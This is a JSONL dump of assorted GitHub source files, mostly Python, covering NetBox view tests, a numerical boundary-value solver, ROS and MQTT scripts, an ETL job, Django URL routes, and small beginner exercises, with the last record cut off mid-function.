self.client.force_login(user)\n\n vrf = VRF(name='VRF 1', rd='65000:1')\n vrf.save()\n\n IPAddress.objects.bulk_create([\n IPAddress(family=4, address=IPNetwork('10.1.0.0/16'), vrf=vrf),\n IPAddress(family=4, address=IPNetwork('10.2.0.0/16'), vrf=vrf),\n IPAddress(family=4, address=IPNetwork('10.3.0.0/16'), vrf=vrf),\n ])\n\n def test_ipaddress_list(self):\n\n url = reverse('ipam:ipaddress_list')\n params = {\n \"vrf\": VRF.objects.first().rd,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_ipaddress(self):\n\n ipaddress = IPAddress.objects.first()\n response = self.client.get(ipaddress.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass VLANGroupTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vlangroup'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n VLANGroup.objects.bulk_create([\n VLANGroup(name='VLAN Group 1', slug='vlan-group-1', site=site),\n VLANGroup(name='VLAN Group 2', slug='vlan-group-2', site=site),\n VLANGroup(name='VLAN Group 3', slug='vlan-group-3', site=site),\n ])\n\n def test_vlangroup_list(self):\n\n url = reverse('ipam:vlangroup_list')\n params = {\n \"site\": Site.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n\nclass VLANTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vlan'])\n self.client = Client()\n self.client.force_login(user)\n\n vlangroup = VLANGroup(name='VLAN Group 1', slug='vlan-group-1')\n vlangroup.save()\n\n VLAN.objects.bulk_create([\n VLAN(group=vlangroup, vid=101, name='VLAN101'),\n VLAN(group=vlangroup, vid=102, name='VLAN102'),\n VLAN(group=vlangroup, vid=103, name='VLAN103'),\n ])\n\n def test_vlan_list(self):\n\n url = reverse('ipam:vlan_list')\n params = {\n \"group\": VLANGroup.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_vlan(self):\n\n vlan = VLAN.objects.first()\n response = self.client.get(vlan.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass ServiceTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_service'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n manufacturer = Manufacturer(name='Manufacturer 1', slug='manufacturer-1')\n manufacturer.save()\n\n devicetype = DeviceType(manufacturer=manufacturer, model='Device Type 1')\n devicetype.save()\n\n devicerole = DeviceRole(name='Device Role 1', slug='device-role-1')\n devicerole.save()\n\n device = Device(name='Device 1', site=site, device_type=devicetype, device_role=devicerole)\n device.save()\n\n Service.objects.bulk_create([\n Service(device=device, name='Service 1', protocol=IP_PROTOCOL_TCP, port=101),\n Service(device=device, name='Service 2', protocol=IP_PROTOCOL_TCP, port=102),\n Service(device=device, name='Service 3', protocol=IP_PROTOCOL_TCP, port=103),\n ])\n\n def test_service_list(self):\n\n url = reverse('ipam:service_list')\n params = {\n \"device_id\": Device.objects.first(),\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_service(self):\n\n service = Service.objects.first()\n response = self.client.get(service.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/ipam/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"11126178063","text":"role = input(\"Введите вашу роль в проекте: \")\nage = input(\"Введите ваш возраст: \")\nage = int(age)\n\nif role == \"admin\" and age > 18:\n print(\"У вас есть все права\")\nelif role == \"user\" and age> 16:\n print(\"У вас на этом проекте есть некоторые права\")\nelse:\n print(\" этот сервис закрыт на карантин\")\n\n\n","repo_name":"isakura313/third_22","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71852278633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 23 09:50:13 2018\n\n@author: luk\n\"\"\"\n\n\"\"\"\ny'' = 4y\ny(0) = 1\ny(1) = 3\ny(t) = (3-e^2)*e^(2t)/(e^2-e^(-2)) + (e^2-3)*e^(-2t)/(e^2-e^(-2))\n\"\"\"\n\nimport numpy as np\nn = 99 # 待求点的个数, 加上已知两个边界点,总共101个点\nya = 1.0; yb = 3.0 # 边值\nt0 = 0.0; t1 = 1.0 # 计算区域\nh = (t1-t0) / (n+1) # 步长\n\ntmpy = np.zeros( (n,1), dtype = np.float64 )\ny = np.zeros( (n+2,1), dtype = np.float64 ) # 数值解\nx = np.zeros( (n+2,1), dtype = np.float64 )\nz = np.zeros( (n+2,1), dtype = np.float64 ) # 解析解\n# 计算系数矩阵a\na = np.zeros( (n,n), dtype = np.float64 )\nfor i in range(n):\n a[i,i] = -4.0 * h * h - 2.0 # 对角元素,只和h有关\n \n\nfor i in range(n-1):\n a[i,i+1] = 1.0\n a[i+1,i] = 1.0\n \n# 计算右端项\nb = np.zeros( (n,1), dtype = np.float64 )\nb[0] = -1 # 只与边值有关,边值的相反数\nb[n-1] = -3\n\na = np.linalg.inv(a)\ntmpy = np.matmul(a,b)\ny[0] = ya; y[n+1] = yb\ny[1:n+1] = tmpy[:]\n\n# 计算解析解\nfor i in range(n+2):\n x[i] = t0 + np.float64(i) * h\n z[i] = ( (3.0-np.exp(-2.0)) * np.exp( 2.0*x[i] ) + ( np.exp(2.0)-3.0 )*np.exp(-2.0*x[i]) ) / ( np.exp(2.0) - np.exp(-2.0) )\n \n \n# 绘图\nfrom matplotlib import pyplot as plt\nfig, axes = plt.subplots()\naxes.plot(x, y, 'r')\naxes.plot(x, z, 'b--')\n\nplt.title( \"LinBVPbyDF\" ) # 设置图标题\nplt.xlabel(\"x\") # 设置坐标轴名称\nplt.ylabel(\"y\")\n\naxes.legend( [\"y\",\"z\"], loc = 9 ) # 设置图例, loc = 9 将legend的位置置于顶部中间\n\n# 调整loc的大小可改变其位置,loc的范围[0-10]\nplt.show()\n\n# 误差图\nfig, axes = plt.subplots()\naxes.plot(x, abs(z-y)/z*100, 'b--')\n\nplt.title( \"Error\" ) # 设置图标题\nplt.xlabel(\"x\") # 设置坐标轴名称\nplt.ylabel(\"error\")\n\nplt.show()\n\nprint( \"please input Enter and stop!\" )\ninput()\n\n\n\n","repo_name":"chdlkl/DigitalComputation","sub_path":"chap7/LinBVPbyDF.py","file_name":"LinBVPbyDF.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72695964393","text":"filename = \"alice_in_wonderland.txt\"\nfile = open(filename, encoding='utf8')\n\n#for line in file:\n#\tprint(line)\n\nraw = file.read()\n#print(raw[:65])\nprint(\"The length of ALice in Wonderland is \" + str(len(raw)))\nresult = []\nfrom string import ascii_lowercase\nfor letter in ascii_lowercase:\n\tcurrent_letter = 0\n\tcurrent = 1\n\twhile current <= len(raw):\n\t\tif raw[int(current):int(current+1)].isalph() and raw[int(current):int(current+1)].lower() == str(letter):\n\t\t\tcurrent_letter += 1\n\t\tcurrent += 1\n\tcurrent_list = [str(letter), str(current_letter)]\n\tresult.append(current_list)\n\tcurrent_letter = 0\nprint(result)","repo_name":"Grifsar/Summer-of-Code","sub_path":"python-weeks/wk2/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34244320698","text":"#!/usr/bin/env python2 \n# -*- coding: utf-8 -*-\nimport rospy\nfrom std_msgs.msg import Int32\n\nvalue = 0\nthreshold = 0\n\ndef clock_callback(clock):\n global value\n global threshold\n\n value += 1\n if value == threshold:\n value_pub.publish(value)\n '''\n if value == threshold:\n rospy.loginfo(\"Clock: \" + str(clock) + \", Threshold: \" + str(value))\n value_pub.publish(value)\n else: \n rospy.loginfo(\"Clock: \" + str(clock) + \", Value: \" + str(value))\n '''\n\nif __name__ == '__main__':\n rospy.init_node(\"counter_node\")\n rospy.loginfo(\"Counter node has been started\")\n\n param_init = rospy.get_param('/counter_node/ros__parameters/init_value')\n value = param_init\n print(\"Initial Value: \" + str(value))\n\n param_threshold = rospy.get_param('/counter_node/ros__parameters/threshold')\n threshold = param_threshold\n print(\"Threshold: \" + str(threshold))\n\n sub = rospy.Subscriber(\"/ros_basics/clock\", Int32, callback=clock_callback)\n\n value_pub = rospy.Publisher(\"/ros_basics/value\", Int32, queue_size=10)\n\n rospy.spin()\n","repo_name":"MarekaGit/homework1_mobile_robots","sub_path":"catkin_ws/src/ros_basics/scripts/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12370784757","text":"import re\nimport bpws\nimport mjdb\nimport config\nimport common as cmn\nimport pandas as pd\nimport datetime as dt\nfrom bs4 import BeautifulSoup as bs\nfrom sqlalchemy import create_engine\n\nLOGDIR = 'etl_benefitpoint'\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\nWSTSFMT = '%Y-%m-%dT%H:%M:%S.%f%z'\n\nlf = cmn.log_filer(LOGDIR,'account_contacts')\n\ndef modified_contacts(lastMod):\n updates = []\n if (dt.datetime.now(dt.timezone.utc) - lastMod).days <= 30:\n try:\n fc = bpws.find_changes(sinceLastModifiedOn=lastMod, typesToInclude='Account_Contact')\n except Exception as e:\n raise ValueError(f\"bpws.find_chanfges(sinceLastModifiedOn={lastMod}, typestoInclude='Account_Contact')\\n{e}\")\n else:\n try:\n for x in bs(fc.content, 'xml').find_all('modifications'):\n if dt.datetime.strptime(x.find('lastModifiedOn').text, WSTSFMT) > lastMod:\n updates.append(bs(bpws.get_account_contact(x.find('entityID').text).content,'xml').find('contact'))\n except Exception as e:\n raise ValueError(f\"unable to get findChanges: {e}\")\n else:\n try:\n for accountId in mjdb.bp_account_ids():\n for contact in bs(bpws.find_account_contacts(accountId),'xml').find_all('contacts'):\n if dt.datetime.strptime(contact.find('lastModifiedOn').text, WSTSFMT) > lastMod:\n updates.append(contact)\n except Exception as e:\n raise ValueError(f\"unable to get findAccountContacts: {e}\")\n return updates\n\ndef col_to_tag(col):\n c = col.split('_')\n return c[0] + ''.join(x.title() for x in c[1:])\n\ndef account_contact_row(accountID, contactID, soup):\n row = {'account_id':accountID, 'contact_id':contactID}\n for i in ('primary_location_id',):\n tag = col_to_tag(i)\n row[i] = int(soup.find(tag).text) if soup.find(tag) else None\n for t in ('title','additional_info','notes'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n for b in ('primary',):\n tag = col_to_tag(b)\n row[b] = bool(soup.find(tag).text) if soup.find(tag) else None\n for ts in ('last_modified_on',):\n tag = col_to_tag(ts)\n row[ts] = dt.datetime.strptime(soup.find(tag).text,WSTSFMT) if soup.find(tag) else None\n row['location_ids'] = ', '.join([x.text for x in soup.find_all('locationIDs')]) if soup.find('locationIDs') else None\n row['responsibilities'] = ', '.join([x.text for x in soup.find_all('responsibilities')]) if soup.find('responsibilities') else None\n return row\n\ndef contact_row(sourceKey, contactID, soup):\n row = {'contact_source':'ACCOUNT','source_key':sourceKey,'contact_id':contactID}\n for t in ('first_name','last_name','email'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef address_row(sourceKey, soup):\n row = {'address_source':'CONTACT', 'source_type':'ACCOUNT', 'source_key':sourceKey}\n for t in ('street_1','street_2','city','state','zip','country'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef phone_row(sourceKey, soup):\n row = {'phone_source':'CONTACT', 'source_type':'ACCOUNT', 'source_key':sourceKey}\n for t in ('area_code','number','type'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef custom_field_value_row(sourceKey, customFieldValueID, soup):\n row = {'cfv_source':'CONTACT', 'source_key':sourceKey, 'custom_field_value_id':customFieldValueID}\n for i in ('custom_field_id','option_value_ID'):\n tag = col_to_tag(i)\n row[i] = int(soup.find(tag).text) if soup.find(tag) else None\n row['value_text'] = soup.find('valueText').text if soup.find('valueText') else None\n return row \n\ndef main():\n \n accountContacts = []\n contacts = []\n addresses = []\n phones = []\n customFieldValues = []\n lastMod = mjdb.bp_last_modified('account_contact') if mjdb.bp_last_modified('account_contact') else dt.datetime(1900,1,1,0,0,0,tzinfo=dt.timezone.utc)\n # lastMod = dt.datetime(2022,9,15,0,0,tzinfo=dt.timezone.utc) ### DEBUG ONLY ###\n for contact in modified_contacts(lastMod):\n accountId = int(contact.find('accountID').text)\n contactId = int(contact.find('contact').find('contactID').text)\n try: \n accountContacts.append(account_contact_row(accountId, contactId, contact))\n except Exception as e:\n lf.error(f\"account_contact_row({accountId}, {contactId}, <>)\\n{e}\")\n try:\n contacts.append(contact_row(accountId, contactId, contact.find('contact')))\n except Exception as e:\n lf.error(f\"contact_row({contactId},<>)\\n{e}\")\n for address in contact.find_all('address'):\n if address.contents:\n try:\n addresses.append(address_row(contactId,address))\n except Exception as e:\n lf.error(f\"address_row(contactID,contact.find(<
      >))\\n{e}\")\n for p in contact.find_all('phones'):\n if not p.has_attr('xsi:nil'):\n try:\n phones.append(phone_row(contactId,p))\n except Exception as e:\n lf.error(f\"phone_row({contactId},<

      >)\\n{e}\")\n for cfv in contact.find_all('customFieldValues'):\n try:\n customFieldValueID = int(cfv.find('customFieldValueID').text)\n customFieldValues.append(custom_field_value_row(contactId, customFieldValueID, cfv))\n except Exception as e:\n lf.error(f\"custom_field_value_row({contactId}, {customFieldValueID}, <>)\\n{e}\")\n stages = {\n 'account_contact':accountContacts if accountContacts else None,\n 'contact':contacts if contacts else None,\n 'address':addresses if addresses else None,\n 'phone':phones if phones else None,\n 'custom_field_value':customFieldValues if customFieldValues else None\n }\n for s in stages:\n if stages[s]:\n try:\n rcs = pd.DataFrame(stages[s]).to_sql(f'stg_{s}', ENGINE, 'benefitpoint', 'replace', index=False, chunksize=10000, method='multi')\n except Exception as e:\n lf.error(f\"unable to stage records for {s}\")\n else:\n if rcs > 0:\n lf.info(f\"{rcs} record(s) staged for {s}\")\n try:\n rcu = mjdb.upsert_stage('benefitpoint', s, 'upsert')\n except Exception as e:\n lf.error(f\"mjdb.upsert_stage('benefitpoint', {s})\\n{e}\")\n else:\n lf.info(f\"mjdb.upsert_stage('benefitpoint', {s}) affected {rcu} record(s)\")\n finally:\n mjdb.drop_table('benefitpoint',f'stg_{s}')\n\nif __name__ == '__main__':\n main()","repo_name":"jbeckom/python-mjdw","sub_path":"etl_benefitpoint_account_contacts.py","file_name":"etl_benefitpoint_account_contacts.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21676707944","text":"import re\nimport sys\n\ndef text_analyzer(*args):\n \"\"\"This function counts the number of upper characters, lower characters,\npunctuation and spaces in a given text..\"\"\"\n if (len(args) == 0):\n print(\"What is the text to analyse?\")\n print(\">> \",end = '')\n sys.stdout.flush()\n string = sys.stdin.readline()\n elif (len(args) == 1): \n string = args[0]\n elif (len(args) > 1):\n print (\"ERROR\")\n exit()\n upperCase = len(re.findall(r'[A-Z]',string))\n lowerCase = len(re.findall(r'[a-z]',string))\n punctuateChar = len(re.findall(r'[!?,.;\\'\\\"-]',string))\n spaces = len(re.findall(r'[ \\t\\n\\r\\v\\f]',string))\n\n print (\"{} upper letters\".format(upperCase))\n print (\"{} lower letters\".format(lowerCase))\n print (\"{} punctuation marks\".format(punctuateChar))\n print (\"{} spaces\".format(spaces))\n\n\n","repo_name":"Mr-lsaidi/42-python-module","sub_path":"module00/ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39878455757","text":"#encoding=utf-8\nimport config\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nimport pandas as pd\n\nclass FeatureDictionary(object):\n def __init__(self, trainfile=None, testfile=None,\n dfTrain=None, dfTest=None, numeric_cols=[], ignore_cols=[]):\n assert not ((trainfile is None) and (dfTrain is None)), \"trainfile or dfTrain at least one is set\"\n assert not ((trainfile is not None) and (dfTrain is not None)), \"only one can be set\"\n assert not ((testfile is None) and (dfTest is None)), \"testfile or dfTest at least one is set\"\n assert not ((testfile is not None) and (dfTest is not None)), \"only one can be set\"\n self.trainfile = trainfile\n self.testfile = testfile\n self.dfTrain = dfTrain\n self.dfTest = dfTest\n self.numeric_cols = numeric_cols\n self.ignore_cols = ignore_cols\n self.gen_feat_dict()\n\n def gen_feat_dict(self):\n if self.dfTrain is None:\n dfTrain = pd.read_csv(self.trainfile)\n else:\n dfTrain = self.dfTrain\n if self.dfTest is None:\n dfTest = pd.read_csv(self.testfile)\n else:\n dfTest = self.dfTest\n df = pd.concat([dfTrain, dfTest])\n self.feat_dict = {}\n tc = 0\n for col in df.columns:\n if col in self.ignore_cols:\n continue\n if col in self.numeric_cols:\n # map to a single index\n self.feat_dict[col] = tc\n tc += 1\n else:\n us = df[col].unique()\n self.feat_dict[col] = dict(zip(us, range(tc, len(us)+tc)))\n tc += len(us)\n\n self.feat_dim = tc\n\nclass DataParser(object):\n def __init__(self, feat_dict):\n self.feat_dict = feat_dict\n\n def parse(self, infile=None, df=None, has_label=False):\n assert not ((infile is None) and (df is None)), \"infile or df at least one is set\"\n assert not ((infile is not None) and (df is not None)), \"only one can be set\"\n if infile is None:\n dfi = df.copy()\n else:\n dfi = pd.read_csv(infile)\n if has_label:\n y = dfi[\"target\"].values.tolist()\n dfi.drop([\"id\", \"target\"], axis=1, inplace=True)\n else:\n ids = dfi[\"id\"].values.tolist()\n dfi.drop([\"id\"], axis=1, inplace=True)\n # dfi for feature index\n # dfv for feature value which can be either binary (1/0) or float (e.g., 10.24)\n dfv = dfi.copy()\n for col in dfi.columns:\n if col in self.feat_dict.ignore_cols:\n dfi.drop(col, axis=1, inplace=True)\n dfv.drop(col, axis=1, inplace=True)\n continue\n if col in self.feat_dict.numeric_cols:\n dfi[col] = self.feat_dict.feat_dict[col]\n else:\n dfi[col] = dfi[col].map(self.feat_dict.feat_dict[col])\n dfv[col] = 1.\n\n # list of list of feature indices of each sample in the dataset\n Xi = dfi.values.tolist()\n # list of list of feature values of each sample in the dataset\n Xv = dfv.values.tolist()\n if has_label:\n return Xi, Xv, y\n else:\n return Xi, Xv, ids\n\ndef load_data():\n '''\n 加载数据\n x_train: 训练数据不包含标签\n y_train: 训练数据中标签\n x_test: 测试数据中不包含标签\n ids_test: 测试数据的id\n cat_features_indices: 类别特征索引\n '''\n train_data = pd.read_csv(config.TRAIN_FILE)\n test_data = pd.read_csv(config.TEST_FILE)\n\n def process(df):\n cols = [c for c in df.columns if c not in ['id', 'target']]\n #统计每个数据的特征值为-1的总和,\n df[\"missing_feat\"] = np.sum((df[cols] == -1).values, axis=1)\n df[\"ps_car_13_x_ps_reg_03\"] = df[\"ps_car_13\"] * df[\"ps_reg_03\"]\n return df\n\n train_data = process(train_data)\n test_data = process(test_data)\n \n cols = [c for c in train_data.columns if c not in [\"id\", \"target\"]]\n cols = [c for c in cols if (not c in config.IGNORE_COLS)]\n\n '''\n 对连续值特征进行归一化处理\n '''\n ss = StandardScaler()\n for col in config.CATEGORICAL_COLS:\n train_data[col] = ss.fit_transform(train_data[col])\n\n x_train = train_data[cols].values\n y_train = train_data['target'].values\n x_test = test_data[cols].values\n \n ids_test = test_data['id'].values\n\n cat_features_indices = [i for i, c in enumerate(cols) if c in config.CATEGORICAL_COLS]\n\n return train_data, test_data, x_train, y_train, x_test, ids_test, cat_features_indices\n\nload_data()\n","repo_name":"xiaopp123/recommendation_practice","sub_path":"DeepFM/data_set.py","file_name":"data_set.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30999150339","text":"import requests\nimport xml.etree.ElementTree as ET\nfrom src.exceptions import ParsingError\n\n\ndef get_currencies():\n \"\"\"\n Функция парсинга курса валюты с сайта ЦБ\n \"\"\"\n try:\n response = requests.get(\"https://www.cbr.ru/scripts/XML_daily.asp\")\n if response.status_code != 200:\n raise ParsingError(f\"Ошибка получения курса валют! Статус:{response.status_code}\")\n\n root = ET.fromstring(response.content)\n formatted_currencies = {}\n for valute in root.findall('Valute'):\n char_code = valute.find('CharCode').text\n value = float(valute.find('Value').text.replace(',', '.'))\n nominal = int(valute.find('Nominal').text)\n rate = value / nominal\n formatted_currencies[char_code] = rate\n\n formatted_currencies['RUB'] = 1.0\n return formatted_currencies\n except ParsingError as error:\n print(error)\n\n\ndef filter_by_keyword(vacancies, keyword):\n \"\"\"\n Функция поиска по введенному пользователю слову\n \"\"\"\n filtered_vacancies = []\n keyword = keyword.lower()\n\n for vacancy in vacancies:\n if keyword in vacancy.title.lower() or keyword in vacancy.employer.lower():\n filtered_vacancies.append(vacancy)\n\n return filtered_vacancies\n\n\ndef filter_by_platform(vacancies, platform):\n \"\"\"\n Функция фильтрации вакансий по платформе\n \"\"\"\n return [vacancy for vacancy in vacancies if vacancy.api.lower() == platform.lower()]\n\n","repo_name":"asaksonov/parsing_hh_and_sj","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41446295177","text":"\"\"\"adoptamascota URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import views\nfrom django.conf.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom organization.views import OrganizationListView, OrganizationCreateView, OrganizationDetailView, OrganizationUpdateView, OrganizationDeleteView\nfrom blog.views import BlogListView, BlogCreateView, BlogDetailView, BlogUpdateView, BlogDeleteView\nfrom pet.views import PetListView, PetCreateView, PetDetailView, PetUpdateView, PetDeleteView, OrgListView\n\nfrom users import views as users_views\n#from organization import views as organization_views\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('organization/', OrganizationListView.as_view(template_name = \"organization/index.html\"), name='org_index'),\n path('organization/', OrganizationDetailView.as_view(template_name = \"organization/show.html\"), name='org_show'),\n #path('organization/create', organization_views.create, name='create'),\n path('organization/create', OrganizationCreateView.as_view(template_name = \"organization/form.html\"), name='org_create'),\n path('organization/edit/', OrganizationUpdateView.as_view(template_name = \"organization/form.html\"), name='org_edit'),\n path('organization/delete/', OrganizationDeleteView.as_view(), name='org_delete'),\n\n\n path('pet/', PetListView.as_view(template_name = \"pet/index.html\"), name='pet_index'),\n path('pet/org', OrgListView.as_view(template_name = \"pet/org_pets.html\"), name='org_pets'),\n path('pet/', PetDetailView.as_view(template_name = \"pet/show.html\"), name='pet_show'),\n path('pet/create', PetCreateView.as_view(template_name = \"pet/form.html\"), name='pet_create'),\n path('pet/edit/', PetUpdateView.as_view(template_name = \"pet/form.html\"), name='pet_edit'),\n path('pet/delete/', PetDeleteView.as_view(), name='pet_delete'),\n\n path('blog/', BlogListView.as_view(template_name = \"blog/index.html\"), name='blog_index'),\n path('blog/', BlogDetailView.as_view(template_name = \"blog/show.html\"), name='blog_show'),\n path('blog/create', BlogCreateView.as_view(template_name = \"blog/form.html\"), name='blog_create'),\n path('blog/edit/', BlogUpdateView.as_view(template_name = \"blog/form.html\"), name='blog_edit'),\n path('blog/delete/', BlogDeleteView.as_view(), name='blog_delete'),\n\n path('accounts/register', users_views.register, name='register'),\n path('accounts/profile', users_views.profile, name='profile'),\n\n path('', views.index, name='index'),\n path('contact_admin/', views.contactAdmin, name='contact_admin'),\n]\n\n#Add Django site authentication urls (for login, logout, password management)\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"Alondraptr/AdoptaMascotas","sub_path":"adoptamascota/adoptamascota/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39174635909","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\nimport requests\nimport string\nfrom onAllarm import mailFile\n\nclass subscriber():\n\tdef __init__(self, cid, broker, port, topic):\n\t\tself.cid=cid\n\t\tself.broker=broker\n\t\tself.port=port\n\t\tself.topic=topic\n\t\tself.csmqtt=mqtt.Client(cid, False)\n\t\tself.csmqtt.on_connect=self.myOnConnect\n\t\tself.csmqtt.on_message=self.myOnMessage\n\n\tdef start(self):\n\t\tself.csmqtt.connect(self.broker, self.port)\n\t\tself.csmqtt.loop_start()\n\t\tself.csmqtt.subscribe(self.topic,2)\n\n\tdef stop(self):\n\t\tself.csmqtt.unsubscribe(self.topic)\n\t\tself.csmqtt.loop_stop()\n\t\tself.csmqtt.disconnect()\n\n\t\n\n\tdef myOnConnect (self, csmqtt, userdata, flags, rc):\n\t\tprint (\"Connected to %s topic %s with result code: %d\" % (self.messageBroker, self.topic, rc))\n\tdef myOnMessage (self, csmqtt , userdata, msg):\n\t\tprint (\"Topic:'\" + msg.topic+\"', QoS: '\"+str(msg.qos)+\"' Message: '\"+str(json.loads(msg.payload)) + \"'\")\n\t\tprint(((json.loads(msg.payload)).get(\"e\"))[0].get(\"v\"))\n\t\tprint(msg.topic)\n\n\t\tuserslist=requests.get('http://localhost:8080/users').json()\n\t\tfor user in userslist.values():\n\t\t\tmailFile(user.get('Name'),user.get('Surname'),user.get('Email Address'), time.ctime(time.time()))\n\n\t\t\t\n\nif __name__ == '__main__':\n\t\tsub=[]\n\t\tdata={'ID':'serv1','Description':'Gestore allarme','EndPoints':'iot/21/alarm'}\n\t\trpost=requests.post('http://localhost:8080/services',json.dumps(data))\n\t\trget=requests.get('http://localhost:8080/infoMQTT')\n\t\tjson_info=rget.json()\n\n\t\trgetTopic=requests.get(url+\"/devices?ID=Arduino\")\n\t\ttopica=rgetTopic.json()[0]['EndPoints']\n\n\t\tsub=subscriber('s1', json_info.get('Broker'), int(json_info.get('Port')), 'iot/21'+topica)\n\t\tsub.start()\n\n\n\t\ttime.sleep(4)\n\n\t\ttime.sleep(100)\n\t\tsub.stop()\n","repo_name":"clssra/TIoT21","sub_path":"TIOT GITHUB/SW/SW4/SW4_sub.py","file_name":"SW4_sub.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968237765","text":"import sys\nfrom collections import deque\n\ndef topology_sort():\n result = []\n q = deque()\n # 1. 진입차수가 0인 모든 노드를 큐에 넣는다.\n for i in range(n):\n if indegree[i] == 0: # 처음은 진입차수가 0인 것부터. 진입차수 0이 시작하는 노드이기 때문\n q.append(i)\n # 2. 큐가 빌 때까지 아래 과정 반복한다.\n while q:\n # 2-1. 큐에서 원소를 꺼내 해당 노드에서 나가는 간선을 그래프에서 제거한다.\n now = q.popleft()\n result.append(now + 1) # 결과 넣기 \n for i in graph[now]:\n indegree[i] -= 1\n if indegree[i] == 0: # 2-2. 새롭게 진입차수가 0이된 노드를 큐에 넣는다.\n q.append(i)\n\n if sum(indegree) > 0: # 순서 정하는 게 불가능한 경우\n print(0)\n else:\n [print(i) for i in result]\n\nn, m = map(int, sys.stdin.readline().split()) # 가수의 수, 보조 pd 수\nindegree = [0] * n\nresult = [1] * n\ngraph = [[] for i in range(n)]\n\nfor _ in range(m):\n list_ = list(map(int, sys.stdin.readline().split()))\n for a, b in zip(list_[1:], list_[2:]):\n graph[a - 1].append(b - 1) # a > b\n indegree[b - 1] += 1 # 진입 차수\n\ntopology_sort()","repo_name":"chaemj97/Algorithm","sub_path":"2022년/12월/백준_2623_음악프로그램.py","file_name":"백준_2623_음악프로그램.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20037010374","text":"import random\n\n# 设置选项及其描述(中文翻译:石头、剪刀、布)\noptions = {'rock': '石头', 'paper': '剪刀', 'scissors': '布'}\n\n# 可以获胜的情况\nwin_cases = [('rock', 'scissors'), ('paper', 'rock'), ('scissors', 'paper')]\n\noptions_enumerate = enumerate(options.items())\noptions_keys = list(options.keys())\n\n# 计算机随机选择选项的函数\n\n\ndef computer_choice():\n # 计算机随机选择一个选项\n computer_choice = random.choice(list(options.keys()))\n # 打印出计算机选择的选项\n print(\"计算机选择了:\", computer_choice)\n return computer_choice\n\n# 判断游戏结果的函数\n\n\ndef check_result(computer, 